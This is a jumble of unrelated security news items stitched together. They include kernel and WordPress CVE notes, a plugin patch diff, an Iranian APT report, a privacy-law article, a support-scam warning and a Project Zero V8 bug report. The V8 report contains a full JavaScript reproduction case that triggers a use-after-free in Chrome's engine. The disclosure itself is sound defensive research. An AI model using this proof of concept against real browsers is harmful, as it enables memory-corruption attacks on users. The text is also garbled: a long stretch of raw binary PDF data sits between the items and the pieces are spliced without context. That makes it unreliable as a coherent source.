In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task.

Permalink

Browse files

mm: enforce min addr even if capable() in expand\_downwards()

security\_mmap\_addr() does a capability check with current\_cred(), but
we can reach this code from contexts like a VFS write handler where
current\_cred() must not be used.

This can be abused on systems without SMAP to make NULL pointer
dereferences exploitable again.

Fixes: 8869477 ("security: protect from stack expansion into low vm addresses")
Cc: stable@kernel.org
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>

*   Loading branch information

CVE-2019-9213: mm: enforce min addr even if capable() in expand_downwards() · torvalds/linux@0a1d529

A local unprivileged attacker may escalate to administrator privileges in Honeywell SoftMaster version 4.51, due to insecure permission assignment.

%PDF-1.3 %��������� 4 0 obj << /Length 5 0 R /Filter /FlateDecode >> stream x�\\mwݶ���\_Aٕ}�%Q���i�$u��v�X�nO�����J�c;'�?h��>�y@$��{�s��} ̿��Ͽzo��y���\_�VY�Z���ؼ�\]1���&��E^\[ׇKk�,�:o�:����/.Ln��|�\_�o�ͅ�������ŘA��������K@���\*�\`צ�����o���|c���7�6�k~�t��L���d֘���F'�SҘa�J2�u���}�ْ�O@�����n3�-�Et���ڢ�z��T%dp�E����m�T��lT�� R�Xd�8k��LQ(��� ��mv���E�S��h�RP�q�-����a��4�K��M\]����m~����#�ݶ)t��-Ȼ� �w��m~���k���˿�Π��y}\]\\���?s3�}/cfm\_}��XlE��h�nh�2Ð�� i�����{Y��E-��\\h������5uC��������u����Ջ�~z~��{����a���T\]QO���?�1��o�|"�3� ��ɫ�\*��a��5�y\[7E�+�>6��N���\\�����;�ca\]Բ�s�����uP�|s����V45�o3����/7~����;'~�}�p��S��}����v�#�-���0~p�č���\`��43=<�s���Eh#p�� ̱m\[�pU�l��yi\`@�ǽ�~�\] �Oq�T�k���\[\*3x���7Eӈ\`����F�����,�u���WAYZbv+�i�0�/���!��X�9�f,�b�����(&E���5̞��-S��Z����Tyݗ�(P؅�Ga�1�:� ��F4��h ��������l=�B�(��X�S�H�u�(0�UQ\[�hH@���\`)�̀W}a:3� ��7�}Xa��;��h�.~���u�����k � 6����:�K����m �� ��q���=된�2dO�дc��h���@;C��Hb�&Wy�9��K��Z�l�9A��П|�8��.Ϸ���l3p�~�s��~��x��������ӱ�ЁHp|����cH�Wx���d9\];�E��6$W����\_b��封R}��� T��~{�/l�#�}W�ȼ�XCמ�T}z�H�A�<���\*�Q�Ä�THbz��d�c�"�����R���.��7�a�<��� S� �:CH��u�S����^i/���"eX!���\]�,�q.��8��L% :c����?�-0o����Mf8�ַ�s��8\\o|s�}���%���W�N|c!v2a���3k|,j���\_�rC��+/D��"g���6a. �� ��Up~�ϱ��k>B8|�5'�l��� �+�A\_�ؖI�K�'�gB�� e52EBm{��񾽓يz�3��f�綈\]b�G<� v�}����T�@1��?�����Ԓ;�R�"�L8 ��!���L�\\�C���l��|�\`T��bxk 9x�\_��+l�V��6R.��N����4T�"XR��Æ��sWU�0�W���-d��5D��h�"P����}\]7;}�>+�td�:CX��}k${xrN�v�}d�tѢ�UlP�i��7��P�PU�P98�������(��YB��1"~� JrbA�h���-.!H����\\�Č��\\���2i��3���-� 0Y��~j��tkc� �N���K~v��F�g��Q��TR?��v�i��q�^��F)�� �$a�%\\n��b7�$���g3��bo����:�C�@ǳ�'y�ilsxr���@��h�g����\\��g\\�B�$RS�D\[g��1���F�\*�HN��)� �44T�x�P�;T�\\�o��\*%�T�A��ifx��L���7Sآ�5/'\*/��-���;QrDi������KQ,b��������k3��Y���j�Ss��16���>o+Dغ��M�bg÷�}\[sm��J����n7" ������l�1������1"W�nT�|1�좡 �de��9�B&Q�<�=���'c�\`����9 0�'�|5=�N��!j��.c��P���|�k�}ݎJ��/�G=�:��e���.�V-�uX�p���&�����\[A)����Tu���H�ȅ�;���6���Z�4@�i,�p���h$�uYRN?.A"e��|q�\`!�L:�<~?TpTp���\[�у��Y�K� ��@��B"��%Ě����,J�v���̌�q�n��7Q��&��n�����OP�q�J� L�� �tݰ�L�φ\[HwH�ٚع����1\\�����0r���� D�� K07N^^�������>WQ����s��2��cl�K?���K\\W��y,����;�,ϰ�+���2�Ȁ�o�m!9<ք�q����i��B�D�g��+�t��ǅ�����T�?@��֏?�aK���́�7M�r.�V�S�({��kJ6�\\ ��\_g:�7(ș���\*�\[�}����Yu�jD��\`��Yv�7&�G��!l���>�ƻ�, ���\_:�/�}�w �\`�;�+���F-�9�ދ���%����@xq&x|�D�i)>��%T��#��8t�;��l3�켠> l���G+�5r.9�4���#6:\*���vb�Q�'ʰ��'����v�4$�'�M�~�R$G}a�3P$�ݧx!:N2�{�g��/kJ���E"8�h&�����M,8Af$��Ϯ�stAYZ��iɢ�I��iu+dm5��Y5�q�O&��Z�zQǐ���hZ���B��������R��h���@�~�ǧǴ��>q�CHy"���K=^n��\_����{\\�\`^h+��xS��p�mڢ� ������n�H{z��������o�#z�.�RvOu��zjSh �T!�iz��Zn�����hlѷ�-n���̴uW4r|i�wO�ʅub�m4aq2���\_/o�p\_��<@X���rKy}�j)�h�Z9��m-�?M�V����i�����3 ���}Z��,��P ��>I��1NLF�"�ͥ��K��d\_:C��1�"��u��rp����'��^}�:��:���5��5\[<�ޱe��Z���c��<��E� ��\`��ib���j���6E"CĂ'��B���X�=��Ml8�&�V�!\]?�M\_\\#�L����)�vqe/B(G�q�����|�ts���~��ٽ�X���D��Eg8Z2��m����Y��dw|3ENʧ����� cfQ�3�^��CTF�I|r���y��M7G���W\\=�P���Nӣ����n�&��8m�>%�ߨ7���B\`���'~��)2$ ��S{דv6��o�K�Ax�g.b~n�8ʛ�� r �6�xW��6;&��h1ZPb���xd�h �!yGߺ>hi�����{�u�\`����x����3��� # -�'�Q��3?u} ����;�&-�h������@�^��-1�É��a �R�D�$G�L2���J�U������>�D��:z!��}�R����V����z��e1��o\[���/P�"3F�p�tۣ!������Y���h�peS�1�ÜV6gw��X|�^AZ�;�.V�|���>�q���� �k��&������϶� A��+��f�o⚪�A��>�'���.#u� g��KP�LW{�<ȋ\\���K�w�p�%�\]Ch�n1��jB��,�u�t�b^i�΂��\*z\`Ѐ��?L"��Q��h� �� '��~c��g�S:��B�0�N���ZM-�M�bJ��ʌ���sV�ˁ�v貈�┭z�ݱ GV�bs��΁!cp�S�a3�@g�q�}�5Sq�h��;�ɰ��ɁT̂p��LE��8�xF2>��Ĕ@(��ƑrXi�\`vёȁvP��f���"g �^�FT�\*�\*\_ȼd�X�W�w��AE.�Ù������z�9�т2��}-��i\`�R�3��5�Sa�lNm��c\*X~��A������w���8%�-�٣@�$/�^� H��Ƀ�� I�&��i��M��� �Pt���C�BL�1f��zE�� 3�zG-bB��E�c���v���������L�gL��N�8���.�'&�E��b�����J(�܆Ɂj�'bZZw�P�u�h��G��Q��;A�|7c��}(�BQ� ��7!��/C\]�w��2�s����۫�WM�o�d�����|����By=iWYl��������|�\_+�Dm s�!>. \*�y\`al���xOD!��B>�K��6�A ��Y �C?���73h��I2VG�N�y�  bWPY����=F� 0�P���\`�H�=r��;�{x"���b���~ӢC��i\[w$B���D�P�\`�.�L���Jl)�-6@L��\[�����ȹ}閭���6�7��&�p"C��q�\_\\3��$"đ��&!,�Q�QO�6vTL�����kJE#/�Y�%��K9c/�<���ƥnc+;Ǟ��wI��S�5� ��H���Td=u-�t�����^n��#sR��=2��80֢>���8�2SW�ً��ӌ8�W��(O�%Y������ ��1��l�lj�ܫ�b�$\*��ILՁ̌N�V���\[l��=����d�V&#�u��+.�-�A�t���U뢎�zST��-8=U�Uf=�:(V������|B\`r���Z����!�F?�/,�X�4��p��+�a~ Wm�a��%�������ߺ�g�zW��a1����89��f�

CVE-2022-2332

The newly signed CTPA is more consumer-friendly than similar legislation in other US states

The newly signed CTPA is more consumer-friendly than similar legislation in other US states

ANALYSIS In the absence of any progress at the federal level, US states continue to move on consumer privacy legislation to give individuals more control and security over their sensitive personal information.

On May 10, 2022, Connecticut Governor Ned Lamont officially signed into law Public Act No. 22-15, ‘An Act Concerning Personal Data Privacy and Online Monitoring’ – more commonly referred to as the Connecticut Privacy Act (CTPA).

Connecticut thus became the fifth state to enact a comprehensive consumer privacy law and the second in 2022, following the Utah Consumer Privacy Act’s passage in March.

RELATED Utah Consumer Privacy Act: New legislation adds another wrinkle to the US legal landscape

While the CTPA is a significant win for consumers and privacy advocates alike – especially as the law is considered much more consumer-friendly than its Utah counterpart – it also further complicates businesses' compliance obligations around a growing patchwork of laws, each slightly different than the next.

Moreover, companies should immediately begin preparing for a number of additional laws that will go into effect in 2023.

At the same time, they should build out their compliance programs with flexibility and adaptability in mind, such that only minimal program modifications are needed when new laws are inevitably enacted in other parts of the country – likely sooner rather than later.

The CTPA will go into effect at the same time as the Colorado Privacy Act on July 1, 2023.

**Scope and applicability**

The CTPA applies to any entity that: (1) conducts business in Connecticut or produces products or services targeted at Connecticut residents; and (2) during the preceding calendar year: (a) controlled or processed the personal data of at least 100,000 consumers; or (b) controlled or processed the personal data of at least 25,000 consumers and derived more than 25% of their gross revenue from the sale of personal data.

Under the CTPA, ‘personal data’ means any information that is linked or reasonably linkable to an identified or identifiable individual.

Of note – in similar fashion to the CPRA, VCDPA, CPA, and UCPA – the CTPA classifies certain types of data as “sensitive data” which triggers additional compliance obligations not applicable to other, more general types of personal data.

RELATED Virginia’s new Consumer Data Protection Act heralds start of another busy year for privacy legislators

Under the CTPA, sensitive data includes: (1) data revealing racial or ethnic origin, religious beliefs, mental or physical health condition or diagnosis, sex life, sexual orientation, or citizenship or immigration status; (2) the processing of genetic or biometric data for the purpose of uniquely identifying an individual; (3) personal data collected from a known child; or (4) precise geolocation data.

**Consumer rights**

The CTPA affords consumers five fundamental rights:

*   Access: The right to confirm whether a controller is processing the consumer’s personal data and access to such data.
*   Correction: The right to correct inaccuracies in the consumer’s personal data, taking into account the nature of the personal data and the purposes of processing it.
*   Deletion: The right to delete personal data provided by, or obtained about, the consumer.
*   Portability: The right to obtain a copy of the consumer’s personal data processed by the controller, in a portable and, to the extent technically feasible, readily usable format that allows the consumer to transmit the data to another controller without hindrance, where the processing is carried out by automated means.
*   Opt-out: The right to opt out of the processing of personal data for purposes of: (1) targeted advertising; (2) personal data sales; and (3) profiling.

**Privacy notices**

Similar to the requirements of other new consumer privacy laws, the CTPA requires controllers to provide consumers with a reasonably accessible privacy notice that includes, among other things, the categories of personal data processed by the controller, the purposes for processing personal data, and how consumers may exercise their rights.

**Data protection assessments**

Under the CTPA, controllers are required to conduct and document data protection assessments (DPAs) for each data processing activity that presents a heightened risk of harm to consumers.

Read more of the latest data privacy news

This could include processing personal data for purposes of targeted advertising; the sale of personal data; profiling; and the processing of sensitive data.

Before processing any sensitive data, controllers must obtain consumer consent and conduct a DPA.

**Data security measures**

Under the CTPA, controllers must establish, implement, and maintain reasonable administrative, technical, and physical data security practices to protect the confidentiality, integrity, and accessibility of personal data appropriate to the volume and nature of the personal data at issue.

The CTPA also sets forth a range of requirements on processors of personal data, which include adhering to the instructions of a controller, assisting the controller in meeting their obligations under the CTPA, and entering into written contracts with controllers that set out instructions that bind the processor.

**Liability and enforcement**

The CTPA does not provide a private right of action for individuals to pursue litigation against entities for alleged violations of the law. Rather, enforcement authority rests exclusively with the Connecticut attorney general.

Companies that violate the CTPA can be subjected to civil penalties of up to $5,000 per violation.

Importantly, however, the CTPA includes a notice and cure provision that provides the opportunity for businesses to avoid enforcement actions if violations are corrected within 60 days after receiving notice of alleged non-compliance.

With that said, the mandatory notice and cure provision will only remain in force until the end of 2024. After that time, the Connecticut attorney general will have discretionary authority over whether to provide a controller with an opportunity to cure before pursuing an enforcement action against it.

**Analysis and takeaways**

With 10% of US states now having their own consumer privacy laws – each with their own unique requirements and restrictions – the task of compliance for companies with operations around the country (or globe) is increasingly complex.

In particular, the now-sizeable web of state laws leaves companies in a precarious position over how to best approach compliance in an efficient and cost-effective manner.

Until recently, most organizations favored either a state-by-state approach to compliance or a ‘highest common denominator’ approach, whereby the strictest state standard for each discrete compliance requirement is implemented across all jurisdictions where consumer privacy statutes are now on the books.

READ MORE NIST refreshes software supply chain risk management guidance

With a fifth state now added to the compliance equation, a third approach is emerging – with companies scrapping the piecemeal approach altogether and instead choosing to offer consumers the same rights and control over their personal information regardless of where they are located.

This uniform, nationwide approach may soon gain more popularity in the near future, as dozens of other states also introduce consumer privacy bills of their own in 2022.

Not only does this approach simplify and streamline organizational compliance burdens, it also provides the additional benefit of providing consumers in many states with greater control and protection over their personal information than is required by law.

This potentially offers a substantial competitive advantage in today’s highly competitive marketplace, especially as consumers demand greater transparency and control when it comes to how their sensitive personal information is collected, used, and protected by the companies they give their hard-earned money to.

With consumer privacy laws in California, Virginia, Colorado, Utah, and now Connecticut all set to go into effect next year, now is the time for companies to consult with experienced privacy and data strategy counsel to begin the task of determining which approach to utilize. Then they can build out their compliance programs to ensure compliance is achievable by 2023.

YOU MIGHT ALSO LIKE DBIR 2022: Ransomware surge increases global data breach woes

Connecticut becomes fifth US state to enact comprehensive consumer privacy law 

A threat actor affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been observed waging a sophisticated cyber espionage campaign targeting financial, government, military, and telecommunications sectors in the Middle East for at least a year.
Israeli cybersecurity firm Check Point, which discovered the campaign alongside Sygnia, is tracking the actor under the name Scarred

A threat actor affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been observed waging a sophisticated cyber espionage campaign targeting financial, government, military, and telecommunications sectors in the Middle East for at least a year.

Israeli cybersecurity firm Check Point, which discovered the campaign alongside Sygnia, is tracking the actor under the name **Scarred Manticore**, which is said to closely overlap with an emerging cluster dubbed Storm-0861, one of the four Iranian groups linked to destructive attacks on the Albanian government last year.

Victims of the operation span various countries such as Saudi Arabia, the United Arab Emirates, Jordan, Kuwait, Oman, Iraq, and Israel.

Scarred Manticore also exhibits some degree of overlap with OilRig, another Iranian nation-state crew that was recently attributed to an attack on an unnamed Middle East government between February and September 2023 as part of an eight-month-long campaign.

Another set of tactical overlaps have been discovered between the adversary and an intrusion set codenamed ShroudedSnooper by Cisco Talos. Attack chains orchestrated by the threat actor have singled out telecom providers in the Middle East using a stealthy backdoor known as HTTPSnoop.

The activity represented by Scarred Manticore is characterized by the use of a previously unknown passive malware framework referred to as LIONTAIL that's installed on Windows servers. The threat actor is believed to be active since at least 2019.

"Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers," Check Point researchers said in a Tuesday analysis. "These include a variety of custom web shells, custom DLL backdoors, and driver-based implants."

An advanced piece of malware, LIONTAIL is a collection of custom shellcode loaders and memory resident shellcode payloads. A noteworthy component of the framework is a lightweight-yet-sophisticated implant written in C that enables attackers to execute commands remotely via HTTP requests.

The attack sequences entail infiltrating publicly facing Windows servers to kick off the malware delivery process and systematically harvest sensitive data from infected hosts.

"Instead of using the HTTP API, the malware uses IOCTLs to interact directly with the underlying HTTP.sys driver," the researchers said, detailing the command-and-control (C2) mechanism.

"This approach is stealthier as it doesn't involve IIS or HTTP API, which are usually closely monitored by security solutions, but is not a straightforward task given that the IOCTLs for HTTP.sys are undocumented and require additional research efforts by the threat actors."

Also deployed alongside LIONTAIL include various web shells and a web forwarder tool called LIONHEAD, a web forwarder.

Historical activity of Scarred Manticore indicates a continuous evolution of the group's malware arsenal, what with the threat actor previously relying on web shells such as Tunna and a bespoke version called FOXSHELL for backdoor access.

Since mid-2020, the threat actor is also said to have used a .NET-based passive backdoor called SDD that establishes C2 communication through an HTTP listener on the infected machine with the ultimate goal of executing arbitrary commands, uploading and downloading files, and running additional .NET assemblies.

The progressive updates to the threat actor's tactics and tools is typical of advanced persistent threat (APT) groups and demonstrates their resources and varied skills. This is best exemplified by Scarred Manticore's use of a malicious kernel driver called WINTAPIX that was uncovered by Fortinet earlier this May.

In a nutshell, WinTapix.sys acts as a loader to execute the next stage of the attack, injecting an embedded shellcode into a suitable user mode process that, in turn, executes an encrypted .NET payload specifically designed to target Microsoft Internet Information Services (IIS) servers.

The targeting of Israel comes amid the ongoing Israel-Hamas war, prompting low-sophistication hacktivist groups to attack various organizations in the country, as well as nations like India and Kenya, suggesting nation-state actors' reliance on information operations aimed at influencing the global perception of the conflict.

"LIONTAIL framework components share similar obfuscation and string artifacts with FOXSHELL, SDD backdoor, and WINTAPIX drivers," Check Point said.

"Examining the history of their activities, it becomes evident how far the threat actor has come in improving their attacks and enhancing their approach which relies on passive implants."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Cyber Espionage Group Targets Financial and Government Sectors in Middle East

Chrome suffers from a copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess.

Chrome: Copy-on-write check bypass in JSNativeContextSpecialization::BuildElementAccess

VULNERABILITY DETAILS  
Copy-on-write is one of V8's internal optimization features that allows multiple JavaScript objects to share the same element store. This feature is primarily used to optimize creation of JavaScript arrays from literals. It's important that every function that can add a new element to a JS object or modify an existing one first checks that the element store isn't marked as COW and makes a copy of the store if needed. Otherwise, the element will be unexpectedly changed for every object that uses the same store.

Consider the implementation of the safety check in `JSNativeContextSpecialization::BuildElementAccess`:

```  
JSNativeContextSpecialization::ValueEffectControl  
JSNativeContextSpecialization::BuildElementAccess(  
    Node* receiver, Node* index, Node* value, Node* effect, Node* control,  
    Node* context, ElementAccessInfo const& access_info,  
    KeyedAccessMode const& keyed_mode) {  
[...]  
    if (keyed_mode.access_mode() == AccessMode::kStore &&  
        IsSmiOrObjectElementsKind(elements_kind) &&  
        !IsCOWHandlingStoreMode(keyed_mode.store_mode())) {  
      effect = graph()->NewNode(  
          simplified()->CheckMaps(  
              CheckMapsFlag::kNone,  
              ZoneHandleSet<Map>(factory()->fixed_array_map())),  
          elements, effect, control);  
    }  
[...]  
}  
```

The `CheckMaps` node is only inserted if the current access mode is `kStore`. However, there are other modes that can also result in storing an element, and one of them is `kDefine`. A call to the `Object.defineProperty` function won't lead to an access in this mode, but an attacker can take advantage of class field initialization to trigger it:

```  
function ReturnHolder() { return define_property_holder }  
class Trigger extends ReturnHolder { 123 = new_value; }  
```

The `Trigger` constructor will perform an element access that's equivalent to the expression `define_property_holder[123] = new_value`, but will set the access mode to `kDefine`, thus bypassing the safety check.

There are likely multiple ways to exploit the issue. The approach the attached reproduction case takes is to create two `PACKED_SMI_ELEMENTS` arrays that share the element store and then get one of the arrays to transition to the `PACKED_ELEMENTS` kind and store a `HeapObject` element. Since copying elements from the corrupted Smi array to another Smi array won't trigger any write barriers, we can hide the pointer from the garbage collector in a new array and trigger a use-after-free on a V8 heap address.

VERSION  
V8 version 10.9.0 (candidate)  
Google Chrome 107.0.5304.87 (Official Build) (64-bit)

REPRODUCTION CASE  
```  
function ForceGC() { try { new ArrayBuffer(2 ** 34); } catch {} }

old_space_array = Array(1, 2);

function CopyElement(from, to) { to[0] = from[0]; } // no write barrier for smi arrays  
for (let i = 0; i < 10000; ++i) {  
  CopyElement(old_space_array, old_space_array);  
}

ForceGC();

function MakeCOW() { return [0]; }  
original_cow_object = MakeCOW();

function MakeCopy() {  
  let copy = original_cow_object.concat(); // create a new object with COW elements  
  copy.splice(); // copy the elements  
  return copy;  
}

new_value = 1;  
new_value = {}; // mark the cell as mutable

function ReturnHolder() { return define_property_holder }  
class Trigger extends ReturnHolder { 0 = new_value; }

for (let i = 0; i < 10000; ++i) {  
  define_property_holder = MakeCopy();  
  new Trigger();  
}

new_value = {};  
define_property_holder = MakeCOW();  
new Trigger();

new_space_array = MakeCOW();  
new_space_array.splice();

CopyElement(new_space_array, old_space_array);

new_value = \"\";  
define_property_holder = MakeCOW();  
new Trigger();

new_space_array = null;  
ForceGC();

console.log(old_space_array[0][0]);

```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-06.

Found by: glazunov@google.com

Chrome JSNativeContextSpecialization::BuildElementAccess Bypass

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

We’ve uncovered a malicious campaign going after Mac users looking for support or extended warranty from Apple via the AppleCare+ support plans. The perpetrators are buying Google ads to lure in their victims and redirect them to bogus pages hosted on GitHub, the developer and code repository platform owned by Microsoft.

The goal of this scam is to get unsuspecting people on the phone with someone pretending to be working for Apple. From there, fraudulent call center agents will social engineer their victims in order to extract money from them.

In this blog post, we expose the techniques behind this scam and provide mitigation steps to stay away from them. We’d like to thank GitHub for their quick response in taking down the malicious accounts we reported to them.

**Hey Siri, google “Apple phone support”**

While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership.

Those “Sponsored” results can appear at the top or further down the search results page. In the image seen below, a malicious ad appears at the very top, right before Apple’s official phone number. In other cases we encountered, multiple malicious ads were displayed before any legitimate results.

Clicking on one of those will redirect to a fake AppleCare+ customer service page, inviting users to call a 1-800 phone number supposedly belonging to Apple. In reality, in just 2 simple clicks victims are connected with scammers located in call centers overseas.

The fake Apple customer service pages are hosted on Microsoft’s GitHub source code repository as standalone HTML templates using Apple’s branding. Scammers are creating several accounts on GitHub with one or multiple repositories with the same fraudulent _index.html_ template:

During an active campaign, they can easily swap phone numbers in case one got reported and blocked. In fact, we saw scammers do just that thanks to GitHub’s commit history:

There is also an interesting piece of code within the page (autoDial) that automatically pops up the phone dialog menu. This ensures that victims have one less thing to click on to get connected with a scammer impersonating Apple:

**Risks and mitigations**

This particular scheme is exceptionally easy to fall for due to the combination of malicious Google ads and lookalike pages. Scammers are preying on unsuspecting users to trust that they are real Apple service agents and that it’s okay to give them personal information.

The biggest risk to consumers is being defrauded for hundreds, and often thousands of dollars. Scammers typically instruct victims to withdraw money from their bank account and send it to them, in various ways.

In some cases we investigated this year, fraudsters will ask for the victim’s name, address, social security number and banking details. With that information, they can easily blackmail them directly or share their profile with other scammers who will pretend to help from the original incident.

We advise users to be extremely cautious when looking for phone or online support related to any of the most popular brands. Microsoft is usually highly targeted by scammers due to its dominance in the computer market share. Keep in mind that whenever you click on a sponsored result or ad, you are taking a chance of being redirected to a malicious site.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Scammers advertise fake AppleCare+ service via GitHub repos 

Cross-Site Request Forgery (CSRF) vulnerability leading to event deletion was discovered in Spiffy Calendar WordPress plugin (versions <= 4.9.0).

CVE-2022-25599: Spiffy Calendar

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

CVE-2022-29434: Spiffy Calendar

The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_purgecache_varnish_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to purge the varnish cache.

*   **wp-fastest-cache/trunk/wpFastestCache.php**
    
    r2886944
    
    r2893158
    
     
    
    410
    
    410
    
    411
    
    411
    
            public function wpfc\_preload\_single\_callback(){
    
     
    
    412
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    413
    
                    die( 'Security check' );
    
     
    
    414
    
                }
    
     
    
    415
    
    412
    
    416
    
                include\_once('inc/single-preload.php');
    
    413
    
    417
    
                SinglePreloadWPFC::create\_cache();
    
    …
    
    …
    
     
    
    425
    
    429
    
    426
    
    430
    
            public function wpfc\_preload\_single\_save\_settings\_callback(){
    
     
    
    431
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    432
    
                    die( 'Security check' );
    
     
    
    433
    
                }
    
     
    
    434
    
    427
    
    435
    
                include\_once('inc/single-preload.php');
    
    428
    
    436
    
                SinglePreloadWPFC::save\_settings();
    
    …
    
    …
    
     
    
    503
    
    511
    
    504
    
    512
    
            public function wpfc\_db\_statics\_callback(){
    
     
    
    513
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    514
    
                    die( 'Security check' );
    
     
    
    515
    
                }
    
     
    
    516
    
               
    
    505
    
    517
    
                global $wpdb;
    
    506
    
    518
    
    …
    
    …
    
     
    
    572
    
    584
    
    573
    
    585
    
            public function wpfc\_save\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    586
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    587
    
                    die( 'Security check' );
    
     
    
    588
    
                }
    
     
    
    589
    
    574
    
    590
    
                include\_once('inc/cdn.php');
    
    575
    
    591
    
                CdnWPFC::save\_cdn\_integration();
    
    …
    
    …
    
     
    
    577
    
    593
    
    578
    
    594
    
            public function wpfc\_start\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    595
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    596
    
                    die( 'Security check' );
    
     
    
    597
    
                }
    
     
    
    598
    
    579
    
    599
    
                include\_once('inc/cdn.php');
    
    580
    
    600
    
                CdnWPFC::start\_cdn\_integration();
    
    …
    
    …
    
     
    
    582
    
    602
    
    583
    
    603
    
            public function wpfc\_pause\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    604
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    605
    
                    die( 'Security check' );
    
     
    
    606
    
                }
    
     
    
    607
    
    584
    
    608
    
                include\_once('inc/cdn.php');
    
    585
    
    609
    
                CdnWPFC::pause\_cdn\_integration();
    
    …
    
    …
    
     
    
    587
    
    611
    
    588
    
    612
    
            public function wpfc\_remove\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    613
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    614
    
                    die( 'Security check' );
    
     
    
    615
    
                }
    
     
    
    616
    
               
    
    589
    
    617
    
                include\_once('inc/cdn.php');
    
    590
    
    618
    
                CdnWPFC::remove\_cdn\_integration();
    
    …
    
    …
    
     
    
    662
    
    690
    
    663
    
    691
    
            public function wpfc\_purgecache\_varnish\_callback(){
    
     
    
    692
    
                if(!wp\_verify\_nonce($\_REQUEST\["security"\], 'wpfc-varnish-ajax-nonce')){
    
     
    
    693
    
                    die( 'Security check' );
    
     
    
    694
    
                }
    
     
    
    695
    
    664
    
    696
    
                if($varnish\_datas = get\_option("WpFastestCacheVarnish")){
    
    665
    
    697
    
                    include\_once('inc/varnish.php');
    
    …
    
    …
    
     
    
    865
    
    897
    
    866
    
    898
    
            public function deleteCacheToolbar(){
    
     
    
    899
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    900
    
                    die( 'Security check' );
    
     
    
    901
    
                }
    
     
    
    902
    
    867
    
    903
    
                $this->deleteCache();
    
    868
    
    904
    
            }
    
    869
    
    905
    
    870
    
    906
    
            public function deleteCssAndJsCacheToolbar(){
    
     
    
    907
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    908
    
                    die( 'Security check' );
    
     
    
    909
    
                }
    
     
    
    910
    
               
    
    871
    
    911
    
                $this->deleteCache(true);
    
    872
    
    912
    
            }
    
    …
    
    …
    
     
    
    911
    
    951
    
    912
    
    952
    
            public function wpfc\_toolbar\_save\_settings\_callback(){
    
     
    
    953
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    954
    
                    die( 'Security check' );
    
     
    
    955
    
                }
    
     
    
    956
    
    913
    
    957
    
                if(current\_user\_can('manage\_options')){
    
    914
    
    958
    
                    if(is\_array($\_GET\["roles"\]) && !empty($\_GET\["roles"\])){
    
    …
    
    …
    
     
    
    939
    
    983
    
    940
    
    984
    
            public function wpfc\_clear\_cache\_of\_allsites\_callback(){
    
     
    
    985
    
     
    
    986
    
                if(defined('DOING\_AJAX') && DOING\_AJAX){
    
     
    
    987
    
                    if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    988
    
                        die( 'Security check' );
    
     
    
    989
    
                    }
    
     
    
    990
    
                }
    
     
    
    991
    
    941
    
    992
    
                include\_once('inc/cdn.php');
    
    942
    
    993
    
                CdnWPFC::cloudflare\_clear\_cache();

CVE-2023-1929: Changeset 2893158 for wp-fastest-cache/trunk/wpFastestCache.php – WordPress Plugin Repository

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure.  Today, we are excited to recognize this year’s top 100 Most Valuable Researchers (MVRs) based on the total number of points earned for each valid report. Congratulations …
  Congratulations to the MSRC 2022 Most Valuable Researchers! Read More »

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure. 

Today, we are excited to recognize this year’s top 100 Most Valuable Researchers (MVRs) based on the total number of points earned for each valid report. Congratulations to each of our MSRC 2022 Most Valuable Researchers! Check out the full list of researchers recognized this year here. 

This list recognizes researchers who submitted valid vulnerabilities between July 1, 2021 and June 30, 2022 and earned the most points. To learn more about our program scope and how to earn points for each valid vulnerability, check out our program page.

